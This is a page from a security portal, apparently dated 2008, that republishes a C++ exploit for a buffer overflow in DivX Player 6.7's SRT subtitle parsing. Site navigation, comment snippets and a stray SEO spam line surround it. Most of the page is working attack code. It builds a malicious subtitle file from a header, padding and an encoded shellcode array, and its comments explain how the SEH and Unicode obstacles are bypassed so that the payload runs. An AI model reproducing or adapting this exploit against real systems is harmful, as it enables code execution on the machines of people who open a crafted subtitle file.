SecuMania Security Portal - DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit

Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

thanks

Basics of the One-Time-Pad

莆田SEO www.0594seo.com.cn 莆田SEM搜索引擎优化营销 www.ptsem.org.cn

Realsecure CGI Attack Subversion Vulnera...

hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...

AR-Blog Comment HTML Injection Vulnerabi...

[…] self-propagating malware in the first place. Share this post: email it! | bookmark it! | digg ...

INDEXU <= 5.0.1 (admin_template_path) Re...

Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...

Advanced Image Hosting (AIH) 2.1 Remote ...

good job you are the best . mgharba talmout :d

Online Rental Property Script <= 4.5 (pi...

Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...

netOffice Dwins Authentication Bypass Vu...

Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...

BM Classifieds <= 20080409 Multiple SQL ...

Current version of script corrected. Security patch available to registered users in the user foru...

Nukedit 4.9.x Remote Create Admin Exploi...

But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Packet Storm

Packet Storm Last 10 Exploits

Packet Storm Last 10 Advisories

Packet Storm Last 10 Tools

Packet Storm Last 10 Miscellaneous Files

Packet Storm Headlines

Visits today:	570
Visits yesterday:	911
Visits month:	19664
Visits total:	65972
Pages total:	930420

DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit

Thursday, 24 April 2008

DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit
Author:	lhoang8500
Date:	2008-04-24
Download:

// Exploit.cpp : Defines the entry point for the console application.
//
 
#include "stdafx.h"
/***********************************************************************
 DivX Player <=6.7 srt subtitle parsing exploit                         
 Coded by lhoang8500@gmail.com
 Tested on Windows XP SP2 + DivX Player 6.7.0
 
 Credit to securfrog  for his PoC
 
  Actually this exploit is not relevant to DivX 6.6.0 exploit already posted in milw0rm,since the
technique is quite different and that exploit is no use for DivX 6.7
  One of the biggest problem is shellcode being converted to unicode (so it has unwanted null byte )
 also the return address,or seh handler has the null byte too
  Another quite touch problem is address of SEH structure(at FS:[0]) is rewritten at the end of the routine
(with some address stored in the stack which already overwritten) so that 
ollydbg will have no chance to catch any exception before the program terminated by the system
  I've tried srt with ANSI code page with no success(just crash),Unicode is either,DivX does not even recognize
Unicode subtitle either.The last resort is UTF8,all payload,addresses is encoded in UTF8 format,so DivX will convert to unicode
at runtine,hence.To modified this exploit,u have to convert to unicode format,fix the address and convert back to UTF8
 
  To exploit this,rename output file with the same name of the movie and load it in DivX Player.
  and the Calculator will be opened
 
***********************************************************************/
 
unsigned char Header[38] =
{
  0xEF, 0xBB, 0xBF, 0x31, 0x20, 0x0D, 0x0A, 0x30, 0x30, 0x3A, 0x30, 0x30, 0x3A, 0x30, 0x31, 0x2C, 
  0x30, 0x30, 0x31, 0x20, 0x2D, 0x2D, 0x3E, 0x20, 0x30, 0x30, 0x3A, 0x30, 0x30, 0x3A, 0x30, 0x32, 
  0x2C, 0x30, 0x30, 0x31, 0x0D, 0x0A, 
} ;
unsigned char ShellCode[319] =
{
  0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 
  0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 
  0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 
  0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 
  0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 
  0x40, 0xEC, 0xB3, 0x9A, 0xE7, 0x82, 0xBA, 0xE1, 0x88, 0xA3, 0xE2, 0xAD, 0xBC, 0xEB, 0x87, 0x89, 
  0xED, 0xA4, 0xA3, 0xE2, 0x91, 0xB4, 0xE5, 0xBF, 0xB4, 0xE5, 0x9C, 0xB1, 0xCC, 0x97, 0xE1, 0x9D, 
  0x97, 0xEB, 0x9E, 0x83, 0xEF, 0x80, 0xA7, 0xEC, 0xAE, 0x89, 0xEB, 0x83, 0x80, 0xE3, 0x8D, 0xB1, 
  0xEB, 0x88, 0x91, 0xE0, 0xBC, 0xB7, 0xEB, 0xA2, 0x9A, 0xE1, 0x9E, 0xB2, 0xEA, 0xBE, 0x9D, 0xEA, 
  0xA0, 0xB6, 0xEA, 0x92, 0x85, 0xE1, 0x98, 0x96, 0xE5, 0x86, 0xB7, 0xED, 0xB7, 0xA1, 0xE2, 0xBA, 
  0x83, 0xE0, 0xBF, 0xB3, 0xEF, 0x83, 0x9A, 0xE6, 0x8D, 0xAD, 0xE3, 0x86, 0x99, 0xE7, 0xB3, 0xB9, 
  0xE7, 0xAD, 0xA3, 0xE8, 0x8C, 0x8F, 0xE9, 0x9E, 0xA1, 0xEB, 0xA3, 0xA4, 0xE4, 0xB1, 0xB1, 0xEC, 
  0xAC, 0x81, 0xDE, 0x9C, 0xE1, 0x9D, 0x96, 0xEF, 0x8D, 0x9E, 0xED, 0xB0, 0x8F, 0xE4, 0xA1, 0xAC, 
  0xEB, 0xB5, 0x9B, 0xE4, 0xBD, 0xB0, 0xEC, 0xAA, 0xB0, 0xEC, 0x92, 0x95, 0xE2, 0x9D, 0x87, 0xE8, 
  0x98, 0xAC, 0xEB, 0x8D, 0xA3, 0xDB, 0xAC, 0xED, 0xBE, 0xAC, 0xE2, 0xA1, 0xB9, 0xE9, 0xA8, 0x9C, 
  0xED, 0x86, 0xBE, 0xE2, 0xBD, 0x90, 0xE2, 0xB9, 0xBE, 0xE5, 0xBF, 0xA2, 0xE8, 0x8D, 0xA3, 0xEF, 
  0x9D, 0xBF, 0xE3, 0x82, 0x93, 0xE8, 0xB1, 0xB6, 0xE7, 0x98, 0xA4, 0xE9, 0x8A, 0x89, 0xEF, 0xB0, 
  0xA4, 0xEA, 0xBB, 0xA2, 0xE3, 0x8D, 0xBB, 0xEA, 0xB8, 0x85, 0xEB, 0xAB, 0x95, 0xEA, 0xB4, 0x91, 
  0xEC, 0x9C, 0x9A, 0xED, 0xA6, 0xB1, 0xEE, 0x83, 0xA4, 0xE6, 0xAB, 0x90, 0xE8, 0xA5, 0xB1, 0xDB, 
  0xAB, 0xEF, 0xBA, 0x8F, 0xEF, 0x87, 0xAC, 0xE6, 0x87, 0xB3, 0xE9, 0xB9, 0xBF, 0xC3, 0xB3, 
} ;
 
int _tmain(int argc, _TCHAR* argv[])
{
  FILE * file;
  char c='A';
  file=fopen("divx67eVil.srt","w+b");
  if (file==NULL)
  {
    printf("File I/O error");
    return 0;
  }
  fwrite(Header,1,sizeof(Header),file);
  for (int i=0;i<0x402;i++) fwrite(&c,1,1,file);
  fwrite(ShellCode,1,sizeof(ShellCode),file);
  for (int i=0;i<4096000;i++) fwrite(&c,1,1,file);
  fclose(file);
  printf("Done...eVil is in divx67eVil.srt");
  printf("Load it in DivX Player 6.7 with some movie en enjoy");
  return 0;
}